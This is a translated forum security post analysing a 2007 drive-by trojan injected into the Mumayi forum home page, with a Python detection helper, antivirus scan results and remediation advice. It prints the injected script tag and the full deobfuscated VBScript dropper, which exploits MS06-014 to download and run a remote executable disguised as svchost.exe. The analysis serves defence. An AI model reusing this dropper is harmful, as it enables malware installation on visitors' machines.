Mumayi forum (木蚂蚁论坛) hit by a drive-by trojan injection; NOD32 users unaffected!
This time the trojan sits on the home page (bbs.mumayi.net): the following line was added to its source code:
<script id="advjs" src="http://web.77276.com/adv.js?showmatrix_num=056"></script>
From showmatrix_num=056 in the link above and the content of adv.js:
document.write("<iframe src=\"http://web.77276.com/1/"+u_num+".htm\" width=\"0\" height=\"0\" frameborder=\"0\"></iframe>");
we can tell that this loads the page http://web.77276.com/1/056.htm.
056.htm then redirects once more, to http://web.77276.com/0.htm. Opening its source shows a mass of three-digit numbers, obviously ASCII codes; once they are converted, the fox finally shows its tail. Here it is:
on error resume next
tc = "http://do.77276.com/0.exe"
fname1="svchost.exe"
fname2="svchost.vbs"
Set df = document.createElement("o"&"b"&"j"&"e"&"c"&"t")
df.setAttribute "c"&"l"&"a"&"s"&"s"&"i"&"d", "c"&"l"&"s"&"id:"&"BD96C5"&"56"&"-65"&"A3"&"-11"&"D0"&"-98"&"3A"&"-00"&"C04"&"FC2"&"9E"&"36"
str="Mic"&"ro"&"so"&"ft."&"X"&"M"&"L"&"HT"&"TP"
str5="A"&"d"&"o"&"d"&"b."&"S"&"tr"&"e"&"am"
Set x = df.CreateObject(str,"")
set S = df.createobject(str5,"")
S.type = 1
str6="G"&"E"&"T"
x.Open str6, tc, False
x.Send
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
fname2= F.BuildPath(tmp,fname2)
set ts = F.OpenTextFile(fname2, 2, True)
ts.WriteLine "Set Shell = CreateObject(""Sh""&""ell""&"".App""&""lic""&""at""&""ion"")"
sql="Shell.ShellExecute"""+fname1+""","""","""",""o""&""p""&""e""&""n"",0"
ts.writeLine sql
ts.close
if F.FileExists(fname1)=true then
if F.FileExists(fname2)=true then
set Q = df.createobject("She"&"ll."&"App"&"li"&"ca"&"tion","")
dc="o"&"p"&"e"&"n"
Q.ShellExecute fname2,"","",dc,0
end if
End if
It downloads http://do.77276.com/0.exe into the temp folder as svchost.exe, and creates svchost.vbs to launch svchost.exe.
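Added triage helper (my own example, not code from the post or the forum): it flags the injected off-site script tag and the zero-size iframe that adv.js writes, decodes the "mass of three-digit numbers" obfuscation seen in 0.htm, rejoins the "a"&"b" string-splitting, and checks the result for the RDS.DataSpace CLSID (MS06-014) or the XMLHTTP plus ADODB.Stream download pair. The sample HTML and the encoded payload below are constructed from the post's own strings, and the regexes, function names and the comma-separated encoding format are assumptions.

```python
import re

# RDS.DataSpace CLSID that the decoded script instantiates (taken from the post).
MS06_014_CLSID = "BD96C556-65A3-11D0-983A-00C04FC29E36"

SCRIPT_SRC = re.compile(r'<script[^>]+src="([^"]+)"', re.I)
IFRAME_TAG = re.compile(r'<iframe[^>]*>', re.I)
ZERO_DIM = re.compile(r'\b(?:width|height)="?0"?', re.I)
# A long run of 2-3 digit numbers: the "lots of three-digit numbers" seen in 0.htm (assumed comma-separated).
DECIMAL_RUN = re.compile(r'(?:\d{2,3}\s*,?\s*){8,}')

def find_injections(html, site_host):
    """Flag absolute <script src> URLs pointing off-site and zero-size <iframe> tags."""
    findings = []
    for m in SCRIPT_SRC.finditer(html):
        src = m.group(1)
        if not re.match(r'https?://', src, re.I):
            continue  # relative paths belong to the site itself
        host = re.sub(r'^https?://', '', src, flags=re.I).split('/')[0]
        if host.lower() != site_host.lower():
            findings.append(('offsite-script', src))
    for m in IFRAME_TAG.finditer(html):
        if len(ZERO_DIM.findall(m.group(0))) >= 2:  # width and height both 0
            findings.append(('hidden-iframe', m.group(0)))
    return findings

def decode_decimal_runs(text):
    """Turn each run of decimal character codes back into the text it hides."""
    return [''.join(chr(int(n)) for n in re.findall(r'\d+', m.group(0)) if int(n) < 256)
            for m in DECIMAL_RUN.finditer(text)]

def unsplit_strings(vbs):
    """Rejoin the "a"&"b" string-splitting so ProgIDs and CLSIDs become searchable."""
    return re.sub(r'"\s*&\s*"', '', vbs)

def looks_like_ms06_014(decoded):
    """True if the script carries the MS06-014 CLSID or the XMLHTTP + ADODB.Stream download pair."""
    joined = unsplit_strings(decoded).upper()
    return (MS06_014_CLSID in joined
            or ("MICROSOFT.XMLHTTP" in joined and "ADODB.STREAM" in joined))

# Constructed sample page: the injected tag from the post plus the hidden iframe adv.js writes.
SAMPLE_HTML = ('<html><body>index<script id="advjs" src="http://web.77276.com/adv.js?showmatrix_num=056">'
               '</script><iframe src="http://web.77276.com/1/056.htm" width="0" height="0" '
               'frameborder="0"></iframe></body></html>')
# Constructed stand-in for 0.htm: two lines of the dropper encoded as comma-separated decimal codes.
HIDDEN_SNIPPET = ('Set df = document.createElement("o"&"b"&"j"&"e"&"c"&"t")\n'
                  'df.setAttribute "classid", "clsid:"&"BD96C5"&"56-65A3-11D0-983A-00C04FC29E36"')
ENCODED_SAMPLE = ','.join('%03d' % ord(c) for c in HIDDEN_SNIPPET)
```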
Below are the multi-engine scan results for 0.exe. The results are fairly inconsistent, and the sample errored when run in a virtual machine, so for now it is not possible to say exactly which virus it is; most detections lean toward Viking, though, so it is probably Viking.
Engine / Version / Signature date / Result
AhnLab-V3 2007.3.24.1 03.24.2007 Win32/Viking.suspicious
AntiVir 7.3.1.44 03.23.2007 TR/Crypt.NSPM.Gen
Authentium 4.93.8 03.24.2007 Possibly a new variant of W32/PWStealer.gen1
Avast 4.7.936.0 03.23.2007 Win32:Tibs-ADO
AVG 7.5.0.447 03.24.2007 no virus found
BitDefender 7.2 03.25.2007 GenPack:Win32.Worm.Viking.IZ
CAT-QuickHeal 9.00 03.23.2007 (Suspicious) - DNAScan
ClamAV devel-20070312 03.25.2007 no virus found
DrWeb 4.33 03.25.2007 Win32.HLLW.Gavir.54
eSafe 7.0.14.0 03.22.2007 suspicious Trojan/Worm
eTrust-Vet 30.6.3506 03.23.2007 Win32/Looked.HN
Ewido 4.0 03.24.2007 no virus found
FileAdvisor 1 03.25.2007 no virus found
Fortinet 2.85.0.0 03.25.2007 suspicious
F-Prot 4.3.1.45 03.23.2007 W32/PWStealer.gen1
F-Secure 6.70.13030.0 03.24.2007 Viking.gen
Ikarus T3.1.1.3 03.25.2007 Trojan-PWS.Win32.OnLineGames.id
Kaspersky 4.0.2.24 03.25.2007 no virus found
McAfee 4991 03.23.2007 no virus found
Microsoft 1.2306 03.25.2007 no virus found
NOD32v2 2143 03.25.2007 Win32/Pacex.Gen
Norman 5.80.02 03.23.2007 Viking.gen
Panda 9.0.0.4 03.24.2007 Suspicious file
Prevx1 V2 03.25.2007 Trojan.SystemPoser
Sophos 4.15.0 03.23.2007 no virus found
Sunbelt 2.2.907.0 03.24.2007 no virus found
Symantec 10 03.25.2007 W32.Lo
If you find svchost.vbs and svchost.exe in your temp folder, scan and remove them immediately, and install the patch for the MS06-014 vulnerability: http://www.microsoft.com/china/t ... letin/ms06-014.mspx